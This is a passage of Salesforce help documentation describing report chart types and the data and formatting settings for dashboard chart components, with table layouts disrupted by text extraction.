For example, to compare the number of opportunities created each month by campaign source in a report, and also to compare
the totals for each month, set record count as the Y-axis, created month as the X-axis, and source as the Groupings value.
The chart displays a single bar for each month, broken down by source, with each source shown in a different color.

The proportion of each source in each month is easy to compare, as are the monthly totals, but comparing a single source’s
contribution to different months, or to the total, may be difficult.

See Also:
Column Charts
Grouped Column Charts
Stacked Bar Charts
Column Chart Stacked to 100 Percent
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Stacked Bar Charts

Use a stacked bar chart when you have multiple groupings and are interested in the proportions between values in each grouping,
as well as each grouping's total.

Available in: All editions except Database.com

For example, to compare the status of leads by campaign in a report, and also to compare the totals for each status, set record
count as the X-axis, status as the Y-axis, and campaign as the Groupings value. The chart displays a single bar for each
status, broken down by campaign, with each campaign shown in a different color.

The proportion of each campaign in each status is easy to compare, as are the totals for each status, but comparing a single
campaign’s contribution to different statuses, or to the total, may be difficult.

See Also:
Bar Charts
Grouped Bar Charts
Bar Charts Stacked to 100%
Column Charts
Grouped Column Charts
Stacked Column Charts
Column Chart Stacked to 100 Percent

Column Chart Stacked to 100 Percent

Use a column chart stacked to 100 percent when you have multiple groupings and are interested in the proportions between
values in each grouping, as well as each grouping's total.

Available in: All editions except Database.com

For example, to compare the number of opportunities created each month by campaign source in a report, and also to compare
the totals for each month, set record count as the Y-axis, created month as the X-axis, and source as the Groupings value.
The chart displays a single bar for each month, broken down by source, with each source shown in a different color. The
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proportion of each source in each month is easy to compare, as are the monthly totals, but comparing a single source’s
contribution to different months, or to the total, may be difficult.

See Also:
Column Charts
Grouped Column Charts
Stacked Column Charts
Stacked Bar Charts

Line Charts

Line charts are good for showing changes in the value of an item over a series of points in time, such as week to week or quarter
to quarter. Use a line chart when you have one important grouping representing an ordered set of data and one value to show.

Line charts are useful for showing data over time. For example, to see the numbers of leads created each month in a report,
set record count as the Y-axis and created month for the X-axis. The chart displays a line connecting the record count
totals for each month. Salesforce does not plot missing (null) values.

If a missing value occurs in the middle of a data set, Salesforce displays a gap in the line.

See Also:
Chart Types
Grouped Line Charts
Cumulative Line Charts
Grouped Cumulative Line Charts

Grouped Line Charts

Use a grouped line chart when you have multiple groupings—each with one important secondary grouping representing an
ordered set of data—and one value to show.

For example, to see monthly leads by lead source in a report, set record count as the Y-axis, created month as the X-axis,
and source as the Groupings value. The chart displays a line for each source, connecting that source's record count totals for
each month. Each line spans the earliest to the latest month containing data. Comparing the total numbers for each month
may be difficult.
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Salesforce does not plot missing (null) values. If a missing value occurs in the middle of a data set, Salesforce displays a gap
in the line.

See Also:
Line Charts
Cumulative Line Charts
Grouped Cumulative Line Charts

Cumulative Line Charts

Use a cumulative line chart when you have one important grouping representing an ordered set of data and one value to show,
summed over time.

For example, to see the total amount of closed opportunities by day in the current month in a report, set amount as the Y-axis
and closing day as the X-axis. The chart displays one line, with the line’s height representing the cumulative amount of
closed opportunities up to and including that day. You can't see the amount for any single day—only the cumulative amount.

If the data set contains a missing (null) value, Salesforce continues the line using the previous value in the data set.

See Also:
Line Charts
Grouped Line Charts
Grouped Cumulative Line Charts

Grouped Cumulative Line Charts

Use a cumulative line chart when you have one important grouping representing an ordered set of data and one value to show,
summed over time.Use a grouped line chart when you have multiple groupings—each with one important secondary grouping
representing an ordered set of data—and one value to show.

For example, to see the total amount of closed opportunities by day for each of the last three months in a report, set amount
as the Y-axis, closing day as the X-axis, and closing month as the Groupings value. The chart displays a line for each
month, with the line’s height representing the cumulative amount of closed opportunities up to and including that day.

See Also:
Line Charts
Grouped Line Charts
Cumulative Line Charts
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Pie Charts

Use a pie chart when you have multiple groupings and want to show the proportion of a single value for each grouping against
the total.

For example, to see the breakdown of your case queue by case status in a report, set record count for Values and status for
Wedges. The chart displays a circle made up of wedges, each wedge representing the cases in a case status. Wedge size is
proportional to the numbers of cases.

Pie charts are not ideal for comparing values that are close together or numerous small values.

Select Show Labels, Show Values, or Show Wedge % to include that information on the chart. (Only available with
Chart Analytics 2.0.)

See Also:
Chart Types

Donut Charts

Use a donut chart when you have multiple groupings and want to show not only the proportion of a single value for each
grouping against the total, but also the total amount itself.

For example, to see the breakdown of your case queue by case status in a report, as well as the total number of cases, set record
count for Values and status for Wedges. The chart displays a donut made up of wedges, each wedge representing a case
status. Wedge size is proportional to the numbers of cases. The total number of cases for all statuses is shown in the middle.

Select Show Labels, Show Values, Show Wedge %, or Show Total to include that information on the chart.

See Also:
Chart Types

Funnel Charts

Use a funnel chart when you have multiple groupings in an ordered set and want to show the proportions among them.

For example, to see the amount of opportunities in each stage in a report, set amount for Values and stage for Segments.
Since the Opportunity: Stage field is an ordered picklist, the stages are sorted in the same order as the picklist, with each
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segment representing the amount for that stage. Funnel charts are useful for showing the flow of opportunities through the
stages; a substantially larger segment may indicate a bottle-neck at that stage.

Select Show Labels, Show Values, or Show Segment % to include that information on the chart.

See Also:
Chart Types

Scatter Charts

Use scatter charts to show meaningful information using one or two groups of report data plus summaries.

For example, to see how stage duration correlates with the number of activities for opportunities, group your report by
Opportunity Name and plot the scatter chart by the grouping. Then set X-Axis on the chart to Record Count and
Y-Axis to Stage Duration. The chart will show a dot for each opportunity. You can tell at a glance if the stage duration
is shorter for opportunities that have more activities.

Because a scatter chart shows data grouped by summarized values, you need at least one grouping in your report. Choose a
report format that allows groupings, such as, summary, matrix, or joined. You also need at least one summarized field in the
report to show data on the axes of the chart. Otherwise, the chart will show record count on the axes. Scatter charts automatically
show data from the source report or you can manually choose what information to display for groupings and summaries.

The Y-axis automatically displaysThe X-axis automatically displaysIf your source report has

Record count.Record count.No summary fields

First summary.One or more summary fields • Either record count or the second
summary in report charts.

• The first summary in dashboard
charts even if the source report has
multiple summaries. But you can
manually choose a different summary
to show on the axis.

This is a report on closed won opportunities grouped by account and opportunity owner. A scatter chart can reveal the potential
for tapping into accounts with a higher annual revenue.

2775

Share Insights with DashboardsShare Insights



This chart builds on some key fields:

1. Plot By automatically chooses the first report grouping. We manually chose the second grouping to show opportunities
won by Account Name.

2. X-axis shows record count when there are no summarized fields or autoselects the first summary field. Since summary is
more useful, the chart shows Sum of Won Amount.

3. Y-axis here shows a manually selected summary field, Average Annual Revenue.
4. Group By is not set by default. Since the report has another grouping, the chart groups data further by the manually

selected Opportunity Owner grouping. The colored dots in the chart and legend show this grouping.

The scatter chart component type in dashboards has these limitations:

• It doesn't show tabular reports.

• You can't sort by labels or values.

• You can only change how Y-axis units are displayed.
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• You can manually define the range for Y-axis alone.

See Also:
Chart Types
Data Settings for Dashboard Chart Components
Chart Types
Modify a Dashboard Component
Data Settings for Dashboard Scatter Chart Components
Formatting Settings for Dashboard Scatter Chart Components
Data Settings for Dashboard Scatter Chart Components
Formatting Settings for Dashboard Scatter Chart Components

Data Settings for Dashboard Chart Components
Choose the data you want to show on your report or dashboard chart. The chart automatically selects groupings and summary
values from your report. You can override some of those choices to focus on the data you need to share.

See Also:
Modify a Dashboard Component
Scatter Charts
Data Settings for Dashboard Bar and Column Chart Components
Data Settings for Dashboard Funnel Chart Components
Data Settings for Dashboard Scatter Chart Components
Data Settings for Dashboard Gauge Components
Data Settings for Dashboard Line Chart Components
Data Settings for Dashboard Metric Components
Data Settings for Dashboard Pie and Donut Chart Components
Data Settings for Dashboard Table Components

Scatter Charts

Use scatter charts to show meaningful information using one or two groups of report data plus summaries.

For example, to see how stage duration correlates with the number of activities for opportunities, group your report by
Opportunity Name and plot the scatter chart by the grouping. Then set X-Axis on the chart to Record Count and
Y-Axis to Stage Duration. The chart will show a dot for each opportunity. You can tell at a glance if the stage duration
is shorter for opportunities that have more activities.

Because a scatter chart shows data grouped by summarized values, you need at least one grouping in your report. Choose a
report format that allows groupings, such as, summary, matrix, or joined. You also need at least one summarized field in the
report to show data on the axes of the chart. Otherwise, the chart will show record count on the axes. Scatter charts automatically
show data from the source report or you can manually choose what information to display for groupings and summaries.
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The Y-axis automatically displaysThe X-axis automatically displaysIf your source report has

Record count.Record count.No summary fields

First summary.One or more summary fields • Either record count or the second
summary in report charts.

• The first summary in dashboard
charts even if the source report has
multiple summaries. But you can
manually choose a different summary
to show on the axis.

This is a report on closed won opportunities grouped by account and opportunity owner. A scatter chart can reveal the potential
for tapping into accounts with a higher annual revenue.

This chart builds on some key fields:

1. Plot By automatically chooses the first report grouping. We manually chose the second grouping to show opportunities
won by Account Name.
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2. X-axis shows record count when there are no summarized fields or autoselects the first summary field. Since summary is
more useful, the chart shows Sum of Won Amount.

3. Y-axis here shows a manually selected summary field, Average Annual Revenue.
4. Group By is not set by default. Since the report has another grouping, the chart groups data further by the manually

selected Opportunity Owner grouping. The colored dots in the chart and legend show this grouping.

The scatter chart component type in dashboards has these limitations:

• It doesn't show tabular reports.

• You can't sort by labels or values.

• You can only change how Y-axis units are displayed.

• You can manually define the range for Y-axis alone.

See Also:
Chart Types
Data Settings for Dashboard Chart Components
Chart Types
Modify a Dashboard Component
Data Settings for Dashboard Scatter Chart Components
Formatting Settings for Dashboard Scatter Chart Components
Data Settings for Dashboard Scatter Chart Components
Formatting Settings for Dashboard Scatter Chart Components

Data Settings for Dashboard Bar and Column Chart Components

Horizontal bar and vertical column charts are useful for comparing the values of one or more report groupings. Use the
Component Data tab to select the groupings and summaries you want your bar or column chart to display.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Choose what values to display on the axes of your chart. Depending on the chart type, axis values can be record count, summary
fields, or groupings defined in the report. For example, to see the amount in each sales stage in a report, select Sum of
Amount as the X-axis and Stage as the Y-axis. The chart displays one bar for each stage, with the length proportional
to the total opportunity amount.

DescriptionSetting

Choose what values to display on the horizontal axis of your bar, column, scatter, or line chart. Depending
on the chart type, axis values can be summary fields or groupings. To use the second grouping or summary

X-Axis

field defined in the source report’s chart, select Auto. When the source report has a chart, Auto picks the
values used by the chart. If the X-axis corresponds to a custom summary formula that has the Where Will
this Formula Be Displayed? option set to a grouping level other than All summary levels, then
the Y-axis and Groupings selection must correspond to that custom summary formula's grouping level.

Choose what values to display on the vertical axis of your bar, column, scatter, or line chart. Depending on
the chart type, axis values can be summary fields or groupings. To use the second grouping or summary field

Y-Axis

defined in the source report’s chart, select Auto. When the source report has a chart, Auto picks the values
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DescriptionSetting

used by the chart. If the Y-axis corresponds to a custom summary formula that has the Where Will this
Formula Be Displayed? option set to a grouping level other than All summary levels, then the
X-axis and Groupings selection must correspond to that custom summary formula's grouping level.

Choose how to group information on your chart. This option is available only if the underlying report has
more than one grouping. To use the second grouping or summary field defined in the source report’s chart,
select Auto.

Group By

Select this option to plot additional values on this chart. The chart type you chose must allow combination
charts.

Combination
Chart

Choose a scale for displaying your chart values. For table components, this setting applies only to the first
column. For best results, choose Auto to let Salesforce select appropriate units.

Display
Units

Select where users go when they click a dashboard component: the full source report for the dashboard
component; the source report filtered by the group, X-axis value, or legend entry they clicked; the detail page

Drill Down
to

for a chart or table element, axis value, or legend entry; or a URL that you specify. (You can't use URLs that
begin with “mailto:” or “javascript:”.) Filtered and record detail page drill-down are disabled when viewing
dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Dashboard Bar Chart Components

Data Settings for Dashboard Funnel Chart Components

Funnel charts are useful for showing the flow of opportunities through stages.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Choose what values to display on the axes of your chart. Depending on the chart type, axis values can be record count, summary
fields, or groupings defined in the report.

DescriptionSetting

Choose a scale for displaying your chart values. For table components, this setting applies only to the
first column. For best results, choose Auto to let Salesforce select appropriate units.

Display Units

Select where users go when they click a dashboard component: the full source report for the dashboard
component; the source report filtered by the group, X-axis value, or legend entry they clicked; the detail

Drill Down to

page for a chart or table element, axis value, or legend entry; or a URL that you specify. (You can't use
URLs that begin with “mailto:” or “javascript:”.) Filtered and record detail page drill-down are disabled
when viewing dashboard charts with more than 200 values.

Choose what to display as values for your pie chart, donut chart, funnel chart, gauge, or metric. To use
the second grouping or summary field defined in the source report’s chart, select Auto. When the source

Values

report has a chart, Auto picks the values used by the chart. In gauges and metrics, Auto shows the value
of the first summary field.
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DescriptionSetting

Choose what to display as segments for your funnel chart. To use the second grouping or summary field
defined in the source report’s chart, select Auto. When the source report has a chart, Auto picks the
values used by the chart.

Segments

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Funnel Dashboard Components

Data Settings for Dashboard Scatter Chart Components

Scatter charts are useful to show one or two groups of report data plus summaries. These data settings for the scatter chart are
available in the dashboard component editor under Component Data.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Group and set the scale to help users make sense of the data you are displaying.

DescriptionSetting

Choose the grouping to display on your chart. To always use the first grouping or use what’s in the
source report’s chart, pick Auto.

Plot By

Choose the values to display on the horizontal axis.X-Axis

Choose what values to display on the vertical axis of your bar, column, scatter, or line chart.
Depending on the chart type, axis values can be summary fields or groupings. To use the second

Y-Axis

grouping or summary field defined in the source report’s chart, select Auto. When the source report
has a chart, Auto picks the values used by the chart. If the Y-axis corresponds to a custom summary
formula that has the Where Will this Formula Be Displayed? option set to a grouping
level other than All summary levels, then the X-axis and Groupings selection must correspond
to that custom summary formula's grouping level.

Choose how to group information on your chart. This option is available only if the underlying
report has more than one grouping. To use the second grouping or summary field defined in the
source report’s chart, select Auto.

Group By

Change the measure for values displayed on the Y-axis of the chart.Display Units
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DescriptionSetting

Select where users go when they click the chart. Options include the source report, the filtered
source report, record detail page, or a URL you specify. Filtered report and record detail page options
are unavailable when the chart has more than 200 values.

Drill Down to

See Also:
Data Settings for Dashboard Chart Components
Scatter Charts
Modify a Dashboard Component
Formatting Settings for Dashboard Scatter Chart Components

Data Settings for Dashboard Gauge Components

A gauge is used to see how far you are from reaching a goal. It displays a single value, such as closed deals.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionSetting

Choose what to display as values for your pie chart, donut chart, funnel chart, gauge, or metric. To use
the second grouping or summary field defined in the source report’s chart, select Auto. When the source

Values

report has a chart, Auto picks the values used by the chart. In gauges and metrics, Auto shows the value
of the first summary field.

Choose a scale for displaying your chart values. For table components, this setting applies only to the
first column. For best results, choose Auto to let Salesforce select appropriate units.

Display Units

Select where users go when they click a dashboard component: the full source report for the dashboard
component; the source report filtered by the group, X-axis value, or legend entry they clicked; the detail

Drill Down to

page for a chart or table element, axis value, or legend entry; or a URL that you specify. (You can't use
URLs that begin with “mailto:” or “javascript:”.) Filtered and record detail page drill-down are disabled
when viewing dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Dashboard Gauge Components

Data Settings for Dashboard Line Chart Components

Line charts are useful for showing data over time.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

2782

Share Insights with DashboardsShare Insights



For example, to see the numbers of leads created each month in a report, set record count as the Y-axis and created month
for the X-axis. The chart displays a line connecting the record count totals for each month.

DescriptionSetting

Choose what values to display on the vertical axis of your bar, column, scatter, or
line chart. Depending on the chart type, axis values can be summary fields or

Y-Axis

groupings. To use the second grouping or summary field defined in the source
report’s chart, select Auto. When the source report has a chart, Auto picks the
values used by the chart. If the Y-axis corresponds to a custom summary formula
that has the Where Will this Formula Be Displayed? option set to a
grouping level other than All summary levels, then the X-axis and Groupings
selection must correspond to that custom summary formula's grouping level.

Choose what values to display on the horizontal axis of your bar, column, scatter,
or line chart. Depending on the chart type, axis values can be summary fields or

X-Axis

groupings. To use the second grouping or summary field defined in the source
report’s chart, select Auto. When the source report has a chart, Auto picks the
values used by the chart. If the X-axis corresponds to a custom summary formula
that has the Where Will this Formula Be Displayed? option set to a
grouping level other than All summary levels, then the Y-axis and Groupings
selection must correspond to that custom summary formula's grouping level.

Choose how to group information on your chart. This option is available only if
the underlying report has more than one grouping. To use the second grouping or
summary field defined in the source report’s chart, select Auto.

Group By

Select this option to plot additional values on this chart. The chart type you chose
must allow combination charts.

Combination Chart

Choose a scale for displaying your chart values. For table components, this setting
applies only to the first column. For best results, choose Auto to let Salesforce select
appropriate units.

Display Units

Select where users go when they click a dashboard component: the full source report
for the dashboard component; the source report filtered by the group, X-axis value,

Drill Down to

or legend entry they clicked; the detail page for a chart or table element, axis value,
or legend entry; or a URL that you specify. (You can't use URLs that begin with
“mailto:” or “javascript:”.) Filtered and record detail page drill-down are disabled
when viewing dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Dashboard Line Chart Components

Data Settings for Dashboard Metric Components

The settings on the Component Data tab define how your dashboard metric component gets and manages the data it displays.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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DescriptionSetting

Choose what to display as values for your pie chart, donut chart, funnel chart, gauge, or metric. To use
the second grouping or summary field defined in the source report’s chart, select Auto. When the source

Values

report has a chart, Auto picks the values used by the chart. In gauges and metrics, Auto shows the value
of the first summary field.

Choose a scale for displaying your chart values. For table components, this setting applies only to the
first column. For best results, choose Auto to let Salesforce select appropriate units.

Display Units

Select where users go when they click a dashboard component: the full source report for the dashboard
component; the source report filtered by the group, X-axis value, or legend entry they clicked; the detail

Drill Down to

page for a chart or table element, axis value, or legend entry; or a URL that you specify. (You can't use
URLs that begin with “mailto:” or “javascript:”.) Filtered and record detail page drill-down are disabled
when viewing dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Dashboard Metric Components

Data Settings for Dashboard Pie and Donut Chart Components

A pie chart or a donut chart is good for showing the relative shares of different quantities. Use the component data tab to
select the values your pie or donut chart will compare.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Use a pie chart when you have multiple groupings and want to show the proportion of a single value for each grouping against
the total.

For example, to see the breakdown of your case queue by case status in a report, set record count for Values and status for
Wedges. The chart displays a circle made up of wedges, each wedge representing the cases in a case status.

DescriptionSetting

Choose what to display as values for your pie chart, donut chart, funnel chart, gauge, or metric. To
use the second grouping or summary field defined in the source report’s chart, select Auto. When

Values

the source report has a chart, Auto picks the values used by the chart. In gauges and metrics, Auto
shows the value of the first summary field.

Choose what to display as wedges for your pie or donut chart. To use the second grouping or
summary field defined in the source report’s chart, select Auto. When the source report has a chart,
Auto picks the values used by the chart.

Wedges

Choose a scale for displaying your chart values. For table components, this setting applies only to
the first column. For best results, choose Auto to let Salesforce select appropriate units.

Display Units
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DescriptionSetting

Select where users go when they click a dashboard component: the full source report for the
dashboard component; the source report filtered by the group, X-axis value, or legend entry they

Drill Down to

clicked; the detail page for a chart or table element, axis value, or legend entry; or a URL that you
specify. (You can't use URLs that begin with “mailto:” or “javascript:”.) Filtered and record detail
page drill-down are disabled when viewing dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Pie and Donut Dashboard Components

Data Settings for Dashboard Table Components

A table component shows columns of data from a custom report in a dashboard. The settings on the Component Data tab
control how a table component gets and manages the data it displays.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionField

Choose a scale for displaying your chart values. For table components, this setting applies only to the
first column. For best results, choose Auto to let Salesforce select appropriate units.

Display Units

Select where users go when they click a dashboard component: the full source report for the dashboard
component; the source report filtered by the group, X-axis value, or legend entry they clicked; the

Drill Down to

detail page for a chart or table element, axis value, or legend entry; or a URL that you specify. (You
can't use URLs that begin with “mailto:” or “javascript:”.) Filtered and record detail page drill-down
are disabled when viewing dashboard charts with more than 200 values.

See Also:
Data Settings for Dashboard Chart Components
Formatting Settings for Dashboard Table Components
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Visual Settings for Dashboard Chart Components
Choose the type of chart that fits the data you are sharing, then apply the visual settings that will communicate the data most
effectively.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

See Also:
Modify a Dashboard Component
Formatting Settings for Dashboard Bar Chart Components
Formatting Settings for Funnel Dashboard Components
Formatting Settings for Dashboard Scatter Chart Components
Formatting Settings for Dashboard Gauge Components
Formatting Settings for Dashboard Line Chart Components
Formatting Settings for Dashboard Metric Components
Formatting Settings for Pie and Donut Dashboard Components
Formatting Settings for Dashboard Table Components

Formatting Settings for Dashboard Bar Chart Components

Horizontal bar and vertical column charts are useful for comparing the values of one or more report groupings. Set the scale
and sorting to help you make sense of the data you are displaying.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionSetting

Choose a sorting element to determine what element you want displayed first in the horizontal axis
of any horizontal chart or the vertical axis of any vertical chart. For a table, choose the sort order
for the default two-column table to be ascending or descending by row labels or values.

Sort Rows By

Set the maximum number of elements to include in the top-level grouping of the horizontal axis
of a horizontal chart, vertical axis of a vertical chart, or selected axis of a stacked bar chart. For a

Maximum Values
Displayed

table, set the maximum number of rows to include. For example, if you want to list only your top
five salespeople, create an opportunity report that lists total opportunity amounts by owner and
enter 5 in this field.

Choose a place to display the legend in relation to your chart.Legend Position

Display Chatter photos for up to 20 records in a horizontal bar chart component whose source
report is grouped by a user or group name field. If there are more than 20 records with photos,

Show Chatter
Photos

record names are shown instead of photos. Set Grouping Display to None to show photos. Set
the Drill Down to option to Record Detail Page to take users directly to user profile or
group pages when they click photos. Chatter must be enabled for photos to be displayed. Depending
on your organization's setup, you may not see photos on tables and charts.
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DescriptionSetting

Display the values of individual records or groups on the chart. This only applies to certain chart
types.

Show Values

Display values, labels, and percentages when hovering over charts. Hover details depend on chart
type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled if your chart has
more than 200 data points.

Enable Hover

See Also:
Visual Settings for Dashboard Chart Components

Formatting Settings for Funnel Dashboard Components

Use color to show the status of a value through stages in a funnel chart.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionSetting

Choose a sorting element to determine what element you want displayed first in the horizontal
axis of any horizontal chart or the vertical axis of any vertical chart. For a table, choose the

Sort Rows By

sort order for the default two-column table to be ascending or descending by row labels or
values.

Set the maximum number of elements to include in the top-level grouping of the horizontal
axis of a horizontal chart, vertical axis of a vertical chart, or selected axis of a stacked bar chart.

Maximum Values
Displayed

For a table, set the maximum number of rows to include. For example, if you want to list only
your top five salespeople, create an opportunity report that lists total opportunity amounts by
owner and enter 5 in this field.

Choose a place to display the legend in relation to your chart.Legend Position

Click this link to create a custom table. The Maximum Values Displayed field is populated
with the value you entered, and the first two columns are pre-populated with the default

Combine Small Groups
into “Others”

columns. To customize a table, the source report must be summary or matrix format and
contain a chart.

Display the values of individual records or groups on the chart. This only applies to certain
chart types.

Show Values

Display the percentage value for each segment of funnel charts.Show Segment %
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DescriptionSetting

Display values, labels, and percentages when hovering over charts. Hover details depend on
chart type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled if your
chart has more than 200 data points.

Enable Hover

See Also:
Visual Settings for Dashboard Chart Components

Formatting Settings for Dashboard Scatter Chart Components

Scatter charts are useful to show one or two groups of report data plus summaries. These settings for the scatter chart are
available in the dashboard component editor under Formatting.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Tweak data displayed on the dashboard scatter chart using these settings.

DescriptionSetting

Currently sorting is unavailable.Sort Rows By

Set the maximum number of dots to show on the chart. When set to 5 for example, the chart shows
5 dots. These are the top 5 ascending values in the grouping used by the Plot By field of the scatter
chart.

Maximum Values
Displayed

Keep automatic or choose manual to enter minimum and maximum values for the Y-axis range. If
there are values outside the manual range, Y-axis automatically extends to include them.

Axis Range

Choose a place to display the legend in relation to your chart.Legend Position

Display values or labels when hovering over charts.Show Details on
Hover

See Also:
Visual Settings for Dashboard Chart Components

Formatting Settings for Dashboard Gauge Components

Set the breakpoints and colors on your gauge component to help users interpret the current value of the field you are tracking.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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Optionally, set conditional highlighting by defining up to three value ranges and colors. You need to also set the minimum
and maximum for the scale. You must set highlighting to follow a component and receive alerts in your Chatter feed when
the value crosses a threshold.

DescriptionSetting

The lowest value on the chart.Minimum

Select a color to represent the low range, up to the first breakpoint.Low Range
Color

The value that separates the middle and high range colors on the dashboard.Breakpoint 1

Select a color to represent the middle range, between the first and second breakpoints.Middle Range
Color

Place the chart above or below your report.Breakpoint 2

Select a color to represent the high range, beyond the second breakpoint.High Range
Color

The highest value on the chart.Maximum

Display the percentage value for each wedge of pie and donut charts, or for each segment of funnel
charts. On a gauge, show the percentage value of the point where the needle is pointing.

Show %

Display the total value for the chart. For a table, include the sum total for number and currency summary
fields.

Show Total

See Also:
Visual Settings for Dashboard Chart Components
Modify a Dashboard Component

Formatting Settings for Dashboard Line Chart Components

Line charts are useful for showing data over time. Use sorting and scale to help your users make sense of the data on your line
chart.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionSetting

Choose a sorting element to determine what element you want displayed first in the horizontal axis
of any horizontal chart or the vertical axis of any vertical chart. For a table, choose the sort order
for the default two-column table to be ascending or descending by row labels or values.

Sort Rows By

Set the maximum number of elements to include in the top-level grouping of the horizontal axis
of a horizontal chart, vertical axis of a vertical chart, or selected axis of a stacked bar chart. For a

Maximum Values
Displayed

table, set the maximum number of rows to include. For example, if you want to list only your top
five salespeople, create an opportunity report that lists total opportunity amounts by owner and
enter 5 in this field.
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DescriptionSetting

Choose a manual or automatic axis range for the vertical axis of a bar, line, or column chart. If you
choose manual, enter numbers for the minimum and maximum axis values to be displayed. If there

Y-Axis Range

are data points outside the range that you set, the axis automatically extends to include those values
when you generate the chart.

Choose a place to display the legend in relation to your chart.Legend Position

Display values, labels, and percentages when hovering over charts. Hover details depend on chart
type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled if your chart has
more than 200 data points.

Enable Hover

See Also:
Visual Settings for Dashboard Chart Components

Formatting Settings for Dashboard Metric Components

A metric component displays one value at a point in time. Use color to help users make sense of the data in the metric
component.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Optionally, set conditional highlighting by defining up to three value ranges and colors. You must set highlighting to follow
a component and receive alerts in your Chatter feed when the value crosses a threshold.

Note:

• Enter metric labels directly on components by clicking the empty text field next to the grand total.
• Metric components placed directly above and below each other in a dashboard column are displayed together as

a single component.
• If you don't define breakpoint values or if you leave them blank, alerts won't be sent for the component.

DescriptionSetting

Select a color to represent the low range, up to the first breakpoint.Low Range
Color

The value that separates the middle and high range colors on the dashboard.Breakpoint 1

Select a color to represent the middle range, between the first and second breakpoints.Middle Range
Color

Place the chart above or below your report.Breakpoint 2
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DescriptionSetting

Select a color to represent the high range, beyond the second breakpoint.High Range
Color

See Also:
Visual Settings for Dashboard Chart Components
Modify a Dashboard Component

Formatting Settings for Pie and Donut Dashboard Components

A pie chart is good for showing the relative shares of different quantities. Use the formatting tab to choose how to configure
and label the divisions in your pie chart.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

DescriptionSetting

Choose a sorting element to determine what element you want displayed first in the horizontal
axis of any horizontal chart or the vertical axis of any vertical chart. For a table, choose the sort
order for the default two-column table to be ascending or descending by row labels or values.

Sort Rows By

Set the maximum number of elements to include in the top-level grouping of the horizontal
axis of a horizontal chart, vertical axis of a vertical chart, or selected axis of a stacked bar chart.

Maximum Values
Displayed

For a table, set the maximum number of rows to include. For example, if you want to list only
your top five salespeople, create an opportunity report that lists total opportunity amounts by
owner and enter 5 in this field.

Choose a place to display the legend in relation to your chart.Legend Position

Click this link to create a custom table. The Maximum Values Displayed field is populated
with the value you entered, and the first two columns are pre-populated with the default

Combine Small Groups
into “Others”

columns. To customize a table, the source report must be summary or matrix format and contain
a chart.

Display the values of individual records or groups on the chart. This only applies to certain
chart types.

Show Values

Display the percentage value for each wedge of pie and donut charts.Show %

Display values, labels, and percentages when hovering over charts. Hover details depend on
chart type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled if your
chart has more than 200 data points.

Enable Hover
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DescriptionSetting

Display the total value for the chart. For a table, include the sum total for number and currency
summary fields.

Show Total

See Also:
Visual Settings for Dashboard Chart Components

Formatting Settings for Dashboard Table Components

A table component shows columns of data from a custom report in a dashboard. You can use color and scale to help users
interpret the report data the table displays.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can use the default two-column table or create a custom table with up to four columns and totals.

The default two-column table uses the first grouping and summary field from the chart in the source report. If the report has
no chart, default columns are based on the first grouping and summary field in the report.

Customized tables allow null values in the results. Default two-column tables do not.

To use a tabular report as the source report, Rows to Display must be set for that report.

Optionally, set conditional highlighting by defining up to three value ranges and colors. Highlighting only applies to the first
summary field column in the table.

DescriptionSetting

Choose a sorting element to determine what element you want displayed first in the horizontal axis
of any horizontal chart or the vertical axis of any vertical chart. For a table, choose the sort order
for the default two-column table to be ascending or descending by row labels or values.

Sort Rows By

Set the maximum number of elements to include in the top-level grouping of the horizontal axis
of a horizontal chart, vertical axis of a vertical chart, or selected axis of a stacked bar chart. For a

Maximum Values
Displayed

table, set the maximum number of rows to include. For example, if you want to list only your top
five salespeople, create an opportunity report that lists total opportunity amounts by owner and
enter 5 in this field.

Display Chatter photos for up to 20 records in a horizontal bar chart component whose source
report is grouped by a user or group name field. If there are more than 20 records with photos,

Show Chatter
Photos

record names are shown instead of photos. Set Grouping Display to None to show photos. Set
the Drill Down to option to Record Detail Page to take users directly to user profile or
group pages when they click photos. Chatter must be enabled for photos to be displayed. Depending
on your organization's setup, you may not see photos on tables and charts.

Click this link to create a custom table. The Maximum Values Displayed field is populated
with the value you entered, and the first two columns are pre-populated with the default columns.
To customize a table, the source report must be summary or matrix format and contain a chart.

Customize Table

2792

Share Insights with DashboardsShare Insights



DescriptionSetting

Specify up to four columns to display in the table. Available columns can be any grouping or summary
field used in the chart. Update the report's chart or groupings to make more columns available for
the dashboard table.

Table Columns

Sort the custom table in A-to-Z or smallest-to-largest order in a column. You can't sort on
second-level groupings.

Sort Ascending

Sort the custom table in Z-to-A or largest-to-smallest order in a column. You can't sort on
second-level groupings.

Sort Descending

Display the total value for the chart. For a table, include the sum total for number and currency
summary fields.

Show Total

Go back to the default two-column table.Reset Table to
Defaults

Select a color to represent the low range, up to the first breakpoint.Low Range Color

The value that separates the low and middle range colors on the dashboard.Breakpoint 1

Select a color to represent the middle range, between the first and second breakpoints.Middle Range
Color

Breakpoint 2Breakpoint 2

